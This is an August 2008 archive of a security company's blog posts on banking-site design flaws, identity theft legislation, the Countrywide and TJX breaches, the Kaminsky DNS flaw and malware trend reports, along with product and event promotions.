Archive for August, 2008

The University of Michigan has published the results of a study indicating that the majority of online banking sites have security flaws.

These design flaws aren’t bugs that can be fixed with a patch. They stem from the flow and the layout of these websites

The data, which we must premise as coming from the examinations of 214 banking websites in 2006, indicates that 75% of banking sites had at least one design flaw that makes customers vulnerable to cyber thieves for fraud or identity theft.

Flaws included:

• Insecure login system
  • Nearly 50% of sites having “secure” login systems in insecure web pages with no SSL protocol use
• Putting contact information on an insecure page
  • 55% had insecure contact pages, allowing hackers to redirect people to call a phony call center
• Redirection to outside pages without warning
• Using Social Insurance Numbers as user IDs
  • Also, if a username can be created by the user, there should be a policy on weak passwords
• Emailing secure information
  • Emailing passwords as plain text (31% of banks failed this)

One would hope that some of these flaws have been corrected since the data was collected in 2006. That said, the security landscape is ever evolving and as many new threats pop up as those that are fixed.

“To our surprise, design flaws that could compromise security were widespread and included some of the largest banks in the country. Our focus was on users who try to be careful, but unfortunately some bank sites make it hard for customers to make the right security decisions when doing online banking.” – Atul Prakash, a professor in the Department of Electrical Engineering and Computer Science

Check out the full study here [PDF].

Via christopher null ; Tags: banking, web security, security, it security, design flaws, banking security

Absolute Software is heading to San Francisco next week for the Intel Developer Forum (IDF). IDF is where Intel and industry leaders come together to share their innovations and talk about the future of technology. The conference showcases over 150 companies and has more than 170 hours of expert training. Absolute will be holding a number of presentations to showcase its anti-theft solutions for mobile computers.

• Computer Theft Deterrence and Recovery: A Layered Approach to Security (Wednesday, August 20 5pm)
  • John Livingston talks about the requirements for anti-theft technologies for mobile devices, solutions available, and the importance of combining technology with a forensic investigation team in laptop recovery
• How to Protect Your Business Data and PCs with Intel® Anti-Theft Technology (Tuesday, August 19 4pm)
  • A panel from Absolute & Intel discusses Intel’s new hardware-based security capabilities
• Leveraging Intel® Anti-Theft Technology for Services (Wednesday, August 20 4pm)
  • An interactive discussion from Absolute & Intel about anti-theft technologies, theft management and remote data delete. Come with questions!

Also come by the Absolute Technology Showcase booth (#401). Product demonstrations will be held at:

• Tuesday Aug. 19: 6 pm
• Wednesday Aug. 20: 12 pm & 6 pm
• Thursday Aug. 21: 12 pm

Absolute Software products will also be available for demonstration in a one-on-one setting in the Intel ProZone.

Stay tuned to IDF news on Intel’s IDF blog or on twitter.

Tags: absolute software, intel, intel developer forum, idf, idf08, idf conference, laptop security

The Identity Theft Enforcement and Restitution Act (H.R. 5938) has been amended and was passed by the Senate on July 30, 2008. The bill, championed by Senate Judiciary Committee Chairman Patrick Leahy, was originally introduced and approved by the Senate in November. The bill stalled in the House, and was therefore amended and returned to the House for consideration.

Leahy, who has introduced a number of cyber crime bills (including S. 495, The Personal Data Privacy and Security Act), has combined HR 5938’s cyberattack & identity theft motives with an amendment that would give Secret Service protection to former US vice presidents. The revised bill has the support of the Department of Justice, the Secrete Service, and industry and consumer groups such as the US Chamber of Commerce and the AARP.

Identity Theft Enforcement and Restitution Act (HR 5938) would:

• Give identity theft victims the ability to seek restitution
• Ensure cyber criminals posing as businesses can be prosecuted
• Make it a felony to employ spyware or keyloggers that damage 10+ computers
• Extend cybercrime definitions to include cyberextortion cases

This legislation would not enact federal data breach notification standards, but it would be a first step in the right direction.

Via SC Magazine Tags: leahy, cybercrime, cyber crime, identity theft, id theft, legislation, hr 5938, federal legislation

Who Breached: Countrywide Financial Corporation
Number Affected: 2,000,000
Information breached: Social Security Numbers
How: Insider theft

It’s not very often we hear about intentional insider breaches of information, particularly on this scale. The FBI arrested a former Countrywide Financial Corporation employee and another man in connection with the alleged theft and sale of the information of as many as 2 million mortgage applicants. The personal information of the mortgage applicants included Social Security Numbers.

The breach occurred over a two-year period until it was discovered this July. The insider arrested worked as a senior financial analyst at the lending division of Countrywide, Full Spectrum Lending. The second man arrested is the alleged reseller of the stolen data.

US Attorney spokesman Thom Mrozek says most, or all, of the names were being sold to people within the mortgage industry in order to make new pitches. The insider, who volunteered details to the FBI, would sell batches of about 20,000 customers as “leads” to outside loan agents at approximately 2.5 cents per name, a very low amount on the black market. It is unknown if any of the information was used for fraud or identity theft.

“It’s the potential for new-account fraud that arises when Social Security accounts are compromised,” said Beth Givens, director of the nonprofit Privacy Rights Clearinghouse. “That’s the most serious kind of financial identity theft,” because large amounts can be involved and the fraud is more difficult to detect than it is on preexisting accounts.

“This guy obviously didn’t do his homework. He doesn’t know the value of these on the black market,” she said.

The theft was perpetrated via an unsecured external hard drive. He was able to use one computer in the Spectrum Lending office that he knew to be insecure, missing the security feature that disabled the use of external drives. There was no process of detection in place that would prevent this unsecured computer from accessing network data, nor any procedure in place to prevent unauthorized copying of data.

To learn from this breach:

1. Audit user access to data, to ensure users have only necessary access to data
2. Monitor data access – what is accessed and by whom
3. Restrict copying of data
4. Add real-time detection – be able to detect unauthorized attempts to access data, insecure computer connections, and unusual user activity

Via LA Times, Computer World Tags: data breach, breach, it security, data security, countrywide, countrywide financial, spectrum lending, arrested, fraud

The Department of Justice (DoJ) has charged 11 people in connection with the hacking of 9 major retailers and the theft & sale of more than 41 million credit & debit card numbers (the breach figure many times more than this). This is the largest hacking and identity theft ring that the DoJ has prosecuted and is the result of 3 years worth of undercover investigations.

The eleven people being prosecuted, including the US Secret Service informant, have been charged with conspiracy, computer intrusion, fraud and identity theft. Three of those charged are US citizens, while the others are from Estonia, Ukraine, China, and Belarus.

The indictment returned on August 5th by a federal grand jury in Boston alleges that the suspects hacked into the networks of TJX Companies, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW. Once there, the indictment alleges they installed “sniffer” programs to capture card numbers, passwords and account information. Some of the numbers were used for personal gain, while others were sold and then used to cash out large sums of money. The total dollar amount of the theft is “impossible to quantify”, but is in the multi-million-dollar range. The TJX breach alone has caused severe losses to the company.

“So far as we know, this is the single largest and most complex identity theft case ever charged in this country,” said Attorney General Mukasey. “It highlights the efforts of the Justice Department to fight this pernicious crime and shows that, with the cooperation of our law enforcement partners around the world, we can identify, charge and apprehend even the most sophisticated international computer hackers.”

The United States Secret Service and the Department of Justice has worked with the governments and police forces in Estonia, Ukraine, China, and Belarus to investigate, apprehend and prosecute the individuals allegedly associated with these crimes.

Read more from the DoJ release here.

Via huffington post, CNN, PC World (2) Tags: department of justice, doj, identity theft, id theft, tjx, tjx breach, fraud, hacking, prosecution

In March, security researcher Dan Kaminsky stumbled across a critical bug in the Domain Name System (DNS), one that is fundamental to its design. The flaw allowed for users to be redirected to fake websites. Although the flaw cannot be fixed entirely, patches were critical to make the bug harder to exploit. Therefore, Kaminsky kept the flaw from the public to give researchers time to find patches. The news of the DNS flaw was accidentally leaked.

“This attack is very good,” he said. “This attack is being weaponised out in the field. Everyone needs to patch, please.”

DNS allows computers to find websites – they send a request and get the site location in return. The DNS helps computers understand “www.sitename.com” in numerical code, returning the approproate site to match that name. The “Kaminsky flaw” allows for an attacker to hijack the DNS to send the users to a different location. For example, it could allow phishers to redirect you from your bank’s website to a fake website in order to steal your login details. You would still be on www.sitename.com, but it would not be the real site.

Not long after the vulnerability was leaked earlier this month, exploit code appeared and unpatched DNS servers were attacked. Most DNS vendors have now released patches, although some DNS services are not affected by the exploit (most are). DNS Servers & end-users both need to be patched, and in corporate terms that could mean doing both. It is recommended that you check for updates on your computer to ensure you have all the latest patches available.

You can read more about the DNS flaw and what you need to know here. You can check if your DNS server is vulnerable here.

Via Slashdot, InformationWeek, SFGate, CNET, BBC, InfoWorld ; image: ppdigital @morguefile ; Tags: dns, dns flaw, kaminsky, dns security, internet security, web security, dns patch

Absolute Software has now added geolocation tracking to Computrace, its corporate multi-layered security solution for theft recovery, data protection, and asset tracking.

Computrace with GPS Tracking allows for IT managers to track GPS-enabled laptops to approximately 10 meters (33 feet) and to view reports using Google Maps technology. Check out the screenshot below:

Adding GPS tracking capabilities to Computrace will allow for IT managers to detect missing computers earlier. When a computer goes missing, GPS information becomes a powerful extra tool for the Absolute Software theft recovery team.

How It Works
Using the embedded GPS technology, Computrace acquires latitude and longitude location information from the laptops. Managers can view the location of all GPS-enabled laptops in their account, individually or collectively, via Absolute’s web-based IT asset management portal.

For more details, read the press release here or contact the Absolute Software sales team.

Tags: Absolute Software, GPS tracking, geolocation, google maps, laptop security, laptop tracking, gps laptop tracking, it asset management, asset management, it security, business security, data security

According to the latest Websense State of Internet Security report [PDF] and the Sophos Security Threat report for the first half of 2008, hacked websites are being infected with malware at an ever-increasing rate.

The Sophos report indicates that the website infection rate is three times faster, with Sophos detecting 16,172 malicious webpages every day. Over 90% of the websites spreading malware are legitimate websites, the number one host being Blogger (Blogspot.com). The Websense report is similar, with over 75 percent of the malware-distributing websites being legitimate. Websense indicates that hacked sites outweigh the number of sites specifically set up to deliver attacks and that 60% of the most popular sites on the web were subverted or indirectly involved with some form of malicious activity in the past 6 months.

Sophos technology consultant Graham Cluley warns businesses to educate employees about posting too much information to social networking sites like LinkedIn or Facebook. Experts indicate that cybercriminals are using hacked profiles to launch phishing attacks at employees that result in data breaches.

According to Websense, 45% of the sites hosting malware allow for some portion of user-driven content, so Web 2.0 technologies / social networking services continue to be the focus of attackers. They indicate that 29% of malicious web attacks are designed to steal data.

“Hackers will continue to get creative and leverage user-created content and Web 2.0 applications to create even bigger security concerns for organizations,” the Websense report authors said. “Researchers expect attackers to see a rise in special interest attacks — targeting specific groups of people based on interests and profiles. With an increase in spam and ‘talk back’ sections of new sites, new active media, Web modules, scripting and social networks, organizations will need to ensure their Web, messaging and data security programs are adequate to plug the holes and curb the new avenues hackers exploit to spread malicious code for financial gain.”

IMB’s X-Force Threat Insight report [PDF] also indicates that malware is continuing to accelerate. According to this report, 50% of vulnerabilities are designed to gain local and remote access to data.

Via eweek, 2 Tags: data security, web security, malware, hacked websites, hacking, security, it security, business security, security threats, web 2.0 security